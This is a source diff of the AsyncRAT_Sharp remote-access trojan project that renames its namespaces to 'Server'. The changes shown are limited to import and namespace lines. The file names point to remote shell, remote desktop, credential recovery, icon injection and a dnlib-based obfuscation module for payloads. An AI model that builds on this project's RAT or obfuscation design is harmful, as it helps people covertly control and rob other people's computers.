using System; using System;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using cGeoIp; using cGeoIp;
using System.Drawing; using System.Drawing;
using System.Windows.Forms; using System.Windows.Forms;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleListView public class HandleListView
{ {

View File

@ -6,7 +6,7 @@ using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
using System.Drawing; using System.Drawing;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleLogs public class HandleLogs
{ {

View File

@ -1,9 +1,9 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System.Diagnostics; using System.Diagnostics;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandlePing public class HandlePing
{ {

View File

@ -1,12 +1,12 @@
using AsyncRAT_Sharp.Forms; using Server.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Drawing; using System.Drawing;
using System.IO; using System.IO;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleProcessManager public class HandleProcessManager
{ {

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Drawing; using System.Drawing;
@ -9,7 +9,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleRecovery public class HandleRecovery
{ {

View File

@ -1,14 +1,14 @@
using AsyncRAT_Sharp.Forms; using Server.Forms;
using AsyncRAT_Sharp.Helper; using Server.Helper;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Drawing; using System.Drawing;
using System.IO; using System.IO;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleRemoteDesktop public class HandleRemoteDesktop
{ {

View File

@ -1,4 +1,4 @@
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Drawing; using System.Drawing;
@ -7,7 +7,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleReportWindow public class HandleReportWindow
{ {

View File

@ -1,6 +1,6 @@
using AsyncRAT_Sharp.Forms; using Server.Forms;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Linq; using System.Linq;
@ -8,7 +8,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleShell public class HandleShell
{ {

View File

@ -1,11 +1,11 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System.Diagnostics; using System.Diagnostics;
using System.Drawing; using System.Drawing;
using System.IO; using System.IO;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public class HandleThumbnails public class HandleThumbnails
{ {

View File

@ -1,14 +1,14 @@
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Drawing; using System.Drawing;
using AsyncRAT_Sharp.Forms; using Server.Forms;
using System.Security.Cryptography; using System.Security.Cryptography;
using System.IO; using System.IO;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Handle_Packet namespace Server.Handle_Packet
{ {
public static class Packet public static class Packet
{ {

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack; using Server.MessagePack;
using AsyncRAT_Sharp.Sockets; using Server.Sockets;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Linq; using System.Linq;
@ -9,7 +9,7 @@ using System.Windows.Forms;
using System.Threading; using System.Threading;
using System.Diagnostics; using System.Diagnostics;
namespace AsyncRAT_Sharp.Helper namespace Server.Helper
{ {
public class AsyncTask public class AsyncTask
{ {

View File

@ -15,7 +15,7 @@ using System.Security.Cryptography.X509Certificates;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Helper namespace Server.Helper
{ {
public static class CreateCertificate public static class CreateCertificate
{ {

View File

@ -3,7 +3,7 @@ using System.Runtime.InteropServices;
using System.Security; using System.Security;
namespace AsyncRAT_Sharp.Helper namespace Server.Helper
{ {
public static class IconInjector public static class IconInjector
{ {

View File

@ -1,7 +1,7 @@
using System.Collections; using System.Collections;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Helper namespace Server.Helper
{ {
//support.microsoft.com/en-us/help/319401/how-to-sort-a-listview-control-by-a-column-in-visual-c //support.microsoft.com/en-us/help/319401/how-to-sort-a-listview-control-by-a-column-in-visual-c
public class ListViewColumnSorter : IComparer public class ListViewColumnSorter : IComparer

View File

@ -6,7 +6,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Helper namespace Server.Helper
{ {
public static class ListviewDoubleBuffer public static class ListviewDoubleBuffer
{ {

View File

@ -4,7 +4,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
using System.Windows.Forms; using System.Windows.Forms;
namespace AsyncRAT_Sharp.Helper namespace Server.Helper
{ {
public static class Methods public static class Methods
{ {

View File

@ -6,7 +6,7 @@ using System.Reflection;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Helper namespace Server.Helper
{ {
public class ReferenceLoader : MarshalByRefObject public class ReferenceLoader : MarshalByRefObject
{ {

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack namespace Server.MessagePack
{ {
public class BytesTools public class BytesTools
{ {

View File

@ -19,7 +19,7 @@ using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack namespace Server.MessagePack
{ {
public class MsgPackEnum : IEnumerator public class MsgPackEnum : IEnumerator
{ {

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack namespace Server.MessagePack
{ {
public enum MsgPackType public enum MsgPackType
{ {

View File

@ -5,7 +5,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack namespace Server.MessagePack
{ {
class ReadTools class ReadTools
{ {

View File

@ -5,7 +5,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.MessagePack namespace Server.MessagePack
{ {
class WriteTools class WriteTools
{ {

View File

@ -12,7 +12,7 @@ using System.Windows.Forms;
This program Is distributed for educational purposes only. This program Is distributed for educational purposes only.
*/ */
namespace AsyncRAT_Sharp namespace Server
{ {
static class Program static class Program
{ {

View File

@ -8,7 +8,7 @@
// </auto-generated> // </auto-generated>
//------------------------------------------------------------------------------ //------------------------------------------------------------------------------
namespace AsyncRAT_Sharp.Properties { namespace Server.Properties {
using System; using System;
@ -39,7 +39,7 @@ namespace AsyncRAT_Sharp.Properties {
internal static global::System.Resources.ResourceManager ResourceManager { internal static global::System.Resources.ResourceManager ResourceManager {
get { get {
if (object.ReferenceEquals(resourceMan, null)) { if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("AsyncRAT_Sharp.Properties.Resources", typeof(Resources).Assembly); global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Server.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp; resourceMan = temp;
} }
return resourceMan; return resourceMan;

View File

@ -8,7 +8,7 @@
// </auto-generated> // </auto-generated>
//------------------------------------------------------------------------------ //------------------------------------------------------------------------------
namespace AsyncRAT_Sharp.Properties { namespace Server.Properties {
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]

View File

@ -1,11 +1,11 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Linq; using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public class Base64 : ICrypto public class Base64 : ICrypto
{ {

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet; using dnlib.DotNet;
using dnlib.DotNet.Emit; using dnlib.DotNet.Emit;
using System.Collections.Generic; using System.Collections.Generic;
using System.Linq; using System.Linq;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public class ClassesRenaming : IRenaming public class ClassesRenaming : IRenaming
{ {

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
internal static class DecryptionHelper internal static class DecryptionHelper
{ {

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet; using dnlib.DotNet;
using dnlib.DotNet.Emit; using dnlib.DotNet.Emit;
using System.Collections.Generic; using System.Collections.Generic;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public class FieldsRenaming : IRenaming public class FieldsRenaming : IRenaming
{ {

View File

@ -4,7 +4,7 @@ using System.Collections.Generic;
using System.Linq; using System.Linq;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public static class InjectHelper public static class InjectHelper
{ {

View File

@ -1,8 +1,8 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet; using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public class MethodsRenaming : IRenaming public class MethodsRenaming : IRenaming
{ {

View File

@ -1,4 +1,4 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet; using dnlib.DotNet;
using dnlib.DotNet.Emit; using dnlib.DotNet.Emit;
using System; using System;
@ -7,7 +7,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public class NamespacesRenaming : IRenaming public class NamespacesRenaming : IRenaming
{ {

View File

@ -1,7 +1,7 @@
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet; using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public class PropertiesRenaming : IRenaming public class PropertiesRenaming : IRenaming
{ {

View File

@ -3,7 +3,7 @@ using System.Collections.Generic;
using System.Security.Cryptography; using System.Security.Cryptography;
using System.Text; using System.Text;
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes namespace Server.RenamingObfuscation.Classes
{ {
public static class Utils public static class Utils
{ {

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.RenamingObfuscation.Classes; using Server.RenamingObfuscation.Classes;
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet; using dnlib.DotNet;
using dnlib.DotNet.Emit; using dnlib.DotNet.Emit;
using System; using System;
@ -8,7 +8,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation namespace Server.RenamingObfuscation
{ {
public static class EncryptString public static class EncryptString
{ {

View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text; using System.Text;
using System.Threading.Tasks; using System.Threading.Tasks;
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces namespace Server.RenamingObfuscation.Interfaces
{ {
public interface ICrypto public interface ICrypto
{ {

View File

@ -1,6 +1,6 @@
using dnlib.DotNet; using dnlib.DotNet;
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces namespace Server.RenamingObfuscation.Interfaces
{ {
public interface IRenaming public interface IRenaming
{ {

View File

@ -1,10 +1,10 @@
using AsyncRAT_Sharp.RenamingObfuscation.Classes; using Server.RenamingObfuscation.Classes;
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces; using Server.RenamingObfuscation.Interfaces;
using dnlib.DotNet; using dnlib.DotNet;
// Credit github.com/srn-g/RenamingObfuscation // Credit github.com/srn-g/RenamingObfuscation
// Fxied by nyan cat // Fxied by nyan cat
namespace AsyncRAT_Sharp.RenamingObfuscation namespace Server.RenamingObfuscation
{ {
public class Renaming public class Renaming
{ {

Some files were not shown because too many files have changed in this diff Show More